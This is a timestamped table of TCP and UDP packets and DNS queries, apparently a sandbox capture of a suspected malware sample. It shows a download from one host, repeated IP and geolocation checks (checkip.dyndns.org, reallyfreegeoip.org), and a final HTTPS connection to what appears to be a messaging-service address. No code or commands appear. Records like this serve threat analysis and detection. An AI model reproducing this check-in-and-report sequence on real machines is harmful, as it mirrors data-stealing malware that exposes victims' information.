Oct 30, 2024 08:25:04.710799932 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.710815907 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.710845947 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.710884094 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.710895061 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.710903883 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.710913897 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.710916042 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.710932970 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.710959911 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.710959911 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711021900 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711034060 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711066961 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711071968 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711080074 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711091042 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711102009 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711107016 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711113930 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711126089 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711133957 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711154938 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711345911 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711359024 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711368084 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711396933 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711405993 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711492062 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711503983 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711513996 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711524963 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711539984 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711554050 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711569071 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711638927 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711651087 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711661100 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711672068 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711684942 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711688995 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711708069 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711822987 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711843014 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711853027 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711858034 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711864948 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711877108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711893082 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.711903095 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711921930 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711930990 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.711966991 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.712011099 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.959575891 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:12.594069004 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:12.599478006 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:12.599544048 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:12.600608110 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:12.606026888 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:14.241584063 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:14.242526054 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:14.242595911 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:14.242892027 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:14.242938995 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:14.488867044 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:14.494632006 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:15.735416889 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:15.950253963 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:15.954394102 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:16.689308882 CET	49165	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:16.689357996 CET	443	49165	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:16.689409971 CET	49165	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:16.696822882 CET	49165	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:16.696851015 CET	443	49165	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:17.314955950 CET	443	49165	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:17.315033913 CET	49165	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:17.321307898 CET	49165	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:17.321319103 CET	443	49165	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:17.321599007 CET	443	49165	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:17.408751011 CET	49165	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:17.451334000 CET	443	49165	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:17.546530008 CET	443	49165	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:17.546590090 CET	443	49165	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:17.546809912 CET	49165	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:17.549334049 CET	49165	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:17.602246046 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:17.841226101 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:19.084317923 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:19.098114967 CET	49166	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:19.098148108 CET	443	49166	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:19.098206997 CET	49166	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:19.103698969 CET	49166	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:19.103713036 CET	443	49166	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:19.302359104 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:19.302467108 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:19.714891911 CET	443	49166	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:19.722773075 CET	49166	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:19.722790956 CET	443	49166	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:19.864443064 CET	443	49166	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:19.864485979 CET	443	49166	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:19.864561081 CET	49166	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:19.865113020 CET	49166	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:19.879492998 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:19.885287046 CET	80	49164	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:19.885360956 CET	49164	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:19.903112888 CET	49167	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:19.908514023 CET	80	49167	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:19.908607006 CET	49167	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:19.908701897 CET	49167	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:19.914074898 CET	80	49167	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:20.745129108 CET	80	49167	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:20.762573004 CET	49168	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:20.762622118 CET	443	49168	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:20.762711048 CET	49168	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:20.763179064 CET	49168	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:20.763197899 CET	443	49168	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:20.954159021 CET	80	49167	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:20.954241991 CET	49167	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:21.401387930 CET	443	49168	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:21.405354977 CET	49168	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:21.405385017 CET	443	49168	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:21.552130938 CET	443	49168	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:21.552171946 CET	443	49168	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:21.552264929 CET	49168	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:21.553086042 CET	49168	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:21.599123001 CET	49169	80	192.168.2.22	158.101.44.242
Oct 30, 2024 08:25:21.604536057 CET	80	49169	158.101.44.242	192.168.2.22
Oct 30, 2024 08:25:21.604629993 CET	49169	80	192.168.2.22	158.101.44.242
Oct 30, 2024 08:25:21.604711056 CET	49169	80	192.168.2.22	158.101.44.242
Oct 30, 2024 08:25:21.609963894 CET	80	49169	158.101.44.242	192.168.2.22
Oct 30, 2024 08:25:27.213723898 CET	80	49169	158.101.44.242	192.168.2.22
Oct 30, 2024 08:25:27.239183903 CET	49170	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:27.239240885 CET	443	49170	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:27.239346027 CET	49170	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:27.239829063 CET	49170	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:27.239850044 CET	443	49170	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:27.414789915 CET	49169	80	192.168.2.22	158.101.44.242
Oct 30, 2024 08:25:27.837791920 CET	443	49170	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:27.840890884 CET	49170	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:27.840920925 CET	443	49170	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:27.981725931 CET	443	49170	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:27.981801033 CET	443	49170	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:27.981872082 CET	49170	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:27.982522011 CET	49170	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:27.999571085 CET	49169	80	192.168.2.22	158.101.44.242
Oct 30, 2024 08:25:28.011790037 CET	80	49169	158.101.44.242	192.168.2.22
Oct 30, 2024 08:25:28.011857986 CET	49169	80	192.168.2.22	158.101.44.242
Oct 30, 2024 08:25:28.026714087 CET	49171	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:28.033356905 CET	80	49171	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:28.033436060 CET	49171	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:28.033581018 CET	49171	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:28.038961887 CET	80	49171	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:29.868801117 CET	80	49171	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:29.942946911 CET	49172	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:29.942995071 CET	443	49172	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:29.943070889 CET	49172	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:29.943358898 CET	49172	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:29.943371058 CET	443	49172	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:30.078218937 CET	80	49171	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:30.078326941 CET	49171	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:30.548743010 CET	443	49172	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:30.551599979 CET	49172	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:30.551625013 CET	443	49172	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:30.692729950 CET	443	49172	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:30.692807913 CET	443	49172	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:30.692890882 CET	49172	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:30.693310976 CET	49172	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:30.717087984 CET	49171	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:30.722883940 CET	80	49171	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:30.722964048 CET	49171	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:30.737185001 CET	49173	80	192.168.2.22	132.226.247.73
Oct 30, 2024 08:25:30.742543936 CET	80	49173	132.226.247.73	192.168.2.22
Oct 30, 2024 08:25:30.742763042 CET	49173	80	192.168.2.22	132.226.247.73
Oct 30, 2024 08:25:30.742863894 CET	49173	80	192.168.2.22	132.226.247.73
Oct 30, 2024 08:25:30.748204947 CET	80	49173	132.226.247.73	192.168.2.22
Oct 30, 2024 08:25:33.616075039 CET	80	49173	132.226.247.73	192.168.2.22
Oct 30, 2024 08:25:33.733422041 CET	49174	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:33.733458996 CET	443	49174	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:33.733536959 CET	49174	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:33.734121084 CET	49174	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:33.734136105 CET	443	49174	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:33.826214075 CET	80	49173	132.226.247.73	192.168.2.22
Oct 30, 2024 08:25:33.826294899 CET	49173	80	192.168.2.22	132.226.247.73
Oct 30, 2024 08:25:34.339354992 CET	443	49174	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:34.343709946 CET	49174	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:34.343743086 CET	443	49174	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:34.483208895 CET	443	49174	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:34.483266115 CET	443	49174	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:34.483330011 CET	49174	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:34.484325886 CET	49174	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:34.627818108 CET	49173	80	192.168.2.22	132.226.247.73
Oct 30, 2024 08:25:34.633641005 CET	80	49173	132.226.247.73	192.168.2.22
Oct 30, 2024 08:25:34.633728981 CET	49173	80	192.168.2.22	132.226.247.73
Oct 30, 2024 08:25:34.710064888 CET	49175	80	192.168.2.22	193.122.130.0
Oct 30, 2024 08:25:34.716005087 CET	80	49175	193.122.130.0	192.168.2.22
Oct 30, 2024 08:25:34.716078043 CET	49175	80	192.168.2.22	193.122.130.0
Oct 30, 2024 08:25:34.716197968 CET	49175	80	192.168.2.22	193.122.130.0
Oct 30, 2024 08:25:34.723985910 CET	80	49175	193.122.130.0	192.168.2.22
Oct 30, 2024 08:25:36.613683939 CET	80	49175	193.122.130.0	192.168.2.22
Oct 30, 2024 08:25:36.822176933 CET	80	49175	193.122.130.0	192.168.2.22
Oct 30, 2024 08:25:36.822259903 CET	49175	80	192.168.2.22	193.122.130.0
Oct 30, 2024 08:25:37.413494110 CET	49176	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:37.413556099 CET	443	49176	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:37.413633108 CET	49176	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:37.425961971 CET	49176	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:37.426001072 CET	443	49176	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:38.033864975 CET	443	49176	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:38.039212942 CET	49176	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:38.039244890 CET	443	49176	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:38.177951097 CET	443	49176	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:38.178036928 CET	443	49176	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:38.178107977 CET	49176	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:38.189034939 CET	49176	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:38.394673109 CET	49175	80	192.168.2.22	193.122.130.0
Oct 30, 2024 08:25:38.400609016 CET	80	49175	193.122.130.0	192.168.2.22
Oct 30, 2024 08:25:38.400713921 CET	49175	80	192.168.2.22	193.122.130.0
Oct 30, 2024 08:25:38.498153925 CET	49177	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:38.506015062 CET	80	49177	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:38.506098986 CET	49177	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:38.509279966 CET	49177	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:38.514564991 CET	80	49177	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:39.341414928 CET	80	49177	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:39.550225019 CET	80	49177	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:39.550281048 CET	49177	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:39.610184908 CET	49178	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:39.610239983 CET	443	49178	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:39.610308886 CET	49178	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:39.625894070 CET	49178	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:39.625930071 CET	443	49178	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:40.272365093 CET	443	49178	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:40.277657986 CET	49178	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:40.277688980 CET	443	49178	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:40.420535088 CET	443	49178	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:40.420613050 CET	443	49178	188.114.96.3	192.168.2.22
Oct 30, 2024 08:25:40.420685053 CET	49178	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:40.500183105 CET	49178	443	192.168.2.22	188.114.96.3
Oct 30, 2024 08:25:40.738325119 CET	49177	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:40.744261026 CET	80	49177	193.122.6.168	192.168.2.22
Oct 30, 2024 08:25:40.744318008 CET	49177	80	192.168.2.22	193.122.6.168
Oct 30, 2024 08:25:41.397361040 CET	49179	80	192.168.2.22	132.226.8.169
Oct 30, 2024 08:25:41.402856112 CET	80	49179	132.226.8.169	192.168.2.22
Oct 30, 2024 08:25:41.402906895 CET	49179	80	192.168.2.22	132.226.8.169
Oct 30, 2024 08:25:41.402996063 CET	49179	80	192.168.2.22	132.226.8.169
Oct 30, 2024 08:25:41.408581972 CET	80	49179	132.226.8.169	192.168.2.22
Oct 30, 2024 08:25:42.309554100 CET	80	49179	132.226.8.169	192.168.2.22
Oct 30, 2024 08:25:42.518166065 CET	80	49179	132.226.8.169	192.168.2.22
Oct 30, 2024 08:25:42.518234968 CET	49179	80	192.168.2.22	132.226.8.169
Oct 30, 2024 08:25:42.628320932 CET	49180	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:42.628377914 CET	443	49180	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:42.628431082 CET	49180	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:42.628806114 CET	49180	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:42.628823042 CET	443	49180	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:43.244520903 CET	443	49180	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:43.255908012 CET	49180	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:43.255942106 CET	443	49180	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:43.395937920 CET	443	49180	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:43.396003962 CET	443	49180	188.114.97.3	192.168.2.22
Oct 30, 2024 08:25:43.396106005 CET	49180	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:43.616424084 CET	49180	443	192.168.2.22	188.114.97.3
Oct 30, 2024 08:25:43.631091118 CET	49179	80	192.168.2.22	132.226.8.169
Oct 30, 2024 08:25:43.642066956 CET	80	49179	132.226.8.169	192.168.2.22
Oct 30, 2024 08:25:43.642122030 CET	49179	80	192.168.2.22	132.226.8.169
Oct 30, 2024 08:25:44.899920940 CET	49181	443	192.168.2.22	149.154.167.220
Oct 30, 2024 08:25:44.899971962 CET	443	49181	149.154.167.220	192.168.2.22
Oct 30, 2024 08:25:44.900028944 CET	49181	443	192.168.2.22	149.154.167.220
Oct 30, 2024 08:25:44.964514971 CET	49181	443	192.168.2.22	149.154.167.220
Oct 30, 2024 08:25:44.964535952 CET	443	49181	149.154.167.220	192.168.2.22
Oct 30, 2024 08:25:45.795488119 CET	443	49181	149.154.167.220	192.168.2.22
Oct 30, 2024 08:25:45.795622110 CET	49181	443	192.168.2.22	149.154.167.220
Oct 30, 2024 08:25:45.860886097 CET	49181	443	192.168.2.22	149.154.167.220
Oct 30, 2024 08:25:45.860934973 CET	443	49181	149.154.167.220	192.168.2.22
Oct 30, 2024 08:25:45.861193895 CET	443	49181	149.154.167.220	192.168.2.22
Oct 30, 2024 08:25:45.946333885 CET	49181	443	192.168.2.22	149.154.167.220
Oct 30, 2024 08:25:45.987334967 CET	443	49181	149.154.167.220	192.168.2.22
Oct 30, 2024 08:25:46.184408903 CET	443	49181	149.154.167.220	192.168.2.22
Oct 30, 2024 08:25:46.184484005 CET	443	49181	149.154.167.220	192.168.2.22
Oct 30, 2024 08:25:46.184585094 CET	49181	443	192.168.2.22	149.154.167.220
Oct 30, 2024 08:25:46.342618942 CET	49181	443	192.168.2.22	149.154.167.220
Oct 30, 2024 08:26:25.866079092 CET	80	49167	193.122.6.168	192.168.2.22
Oct 30, 2024 08:26:25.866358042 CET	49167	80	192.168.2.22	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 08:25:12.532938004 CET	54562	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:12.540170908 CET	53	54562	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:12.571228981 CET	52917	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:12.578273058 CET	53	52917	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:16.677999973 CET	62751	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:16.688657999 CET	53	62751	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:19.886425018 CET	57893	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:19.893296003 CET	53	57893	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:19.895354033 CET	54821	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:19.902776957 CET	53	54821	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:20.754029989 CET	54719	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:20.761974096 CET	53	54719	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:21.581365108 CET	49881	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:21.588953972 CET	53	49881	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:21.591655016 CET	54998	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:21.598676920 CET	53	54998	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:27.227332115 CET	52781	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:27.238435030 CET	53	52781	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:28.004789114 CET	63926	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:28.014523983 CET	53	63926	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:28.016516924 CET	65510	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:28.026369095 CET	53	65510	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:29.930043936 CET	62672	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:29.941814899 CET	53	62672	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:30.720957041 CET	56475	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:30.727693081 CET	53	56475	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:30.729911089 CET	49384	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:30.736855984 CET	53	49384	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:33.725078106 CET	54842	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:33.732656002 CET	53	54842	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:34.650343895 CET	58105	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:34.657399893 CET	53	58105	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:34.657597065 CET	58105	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:34.666486025 CET	53	58105	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:34.702517986 CET	64928	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:34.709511995 CET	53	64928	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:37.403094053 CET	57390	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:37.410660982 CET	53	57390	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:38.456196070 CET	58095	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:38.463363886 CET	53	58095	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:38.489801884 CET	54261	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:38.497565985 CET	53	54261	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:39.594027996 CET	60507	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:39.601342916 CET	53	60507	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:40.743726969 CET	50446	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:40.751247883 CET	53	50446	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:41.389600992 CET	55939	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:41.396950960 CET	53	55939	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:42.616375923 CET	49608	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:42.627844095 CET	53	49608	8.8.8.8	192.168.2.22
Oct 30, 2024 08:25:44.892189980 CET	61486	53	192.168.2.22	8.8.8.8
Oct 30, 2024 08:25:44.899302959 CET	53	61486	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 30, 2024 08:25:12.532938004 CET	192.168.2.22	8.8.8.8	0x8f3b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.571228981 CET	192.168.2.22	8.8.8.8	0x3802	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:16.677999973 CET	192.168.2.22	8.8.8.8	0x78f4	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
